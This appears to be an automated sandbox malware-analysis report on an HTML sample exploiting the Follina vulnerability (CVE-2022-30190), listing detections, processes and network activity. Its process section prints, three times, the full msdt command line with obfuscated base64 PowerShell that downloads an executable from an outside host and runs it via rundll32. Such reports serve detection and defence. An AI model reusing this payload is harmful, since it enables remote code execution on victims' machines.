Windows Analysis Report
1024203777.test.html

Overview

General Information

Sample Name:	1024203777.test.html
Analysis ID:	696527
MD5:	c389f7ee1d9e6376b7d96e80d7a1ffe1
SHA1:	2d0b931cf7cecddddb35457a5719353840f8ca66
SHA256:	8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da
Tags:	CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

IP address seen in connection with other malware

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 1024203777.test.html

Virustotal: Detection: 10%

Perma Link

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: 00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: global traffic

HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: 1024203777.test.html

Virustotal: Detection: 10%

Source: C:\Windows\System32\msdt.exe

File created: C:\Users\user\AppData\Local\Temp\msdtadmin

Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal56.expl.winHTML@38/0@6/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\msdt.exe

Window / User API: threadDelayed 2612

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22			Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.78	clients.l.google.com	United States	15169	GOOGLEUS	false
172.217.168.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.215.237	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name	IP	Active
accounts.google.com	216.58.215.237	true
www.google.com	172.217.168.36	true
clients.l.google.com	172.217.168.78	true
clients2.google.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high

ID:	696527
Product:	CloudBasic
Start time:	13:43:41
Start date:	02.09.2022
Sample:	1024203777.test.html
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	c389f7ee1d9e6376b7d96e80d7a1ffe1
SHA1:	2d0b931cf7cecddddb35457a5719353840f8ca66
SHA256:	8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da

Windows Analysis Report
1024203777.test.html

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report 1024203777.test.html

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
1024203777.test.html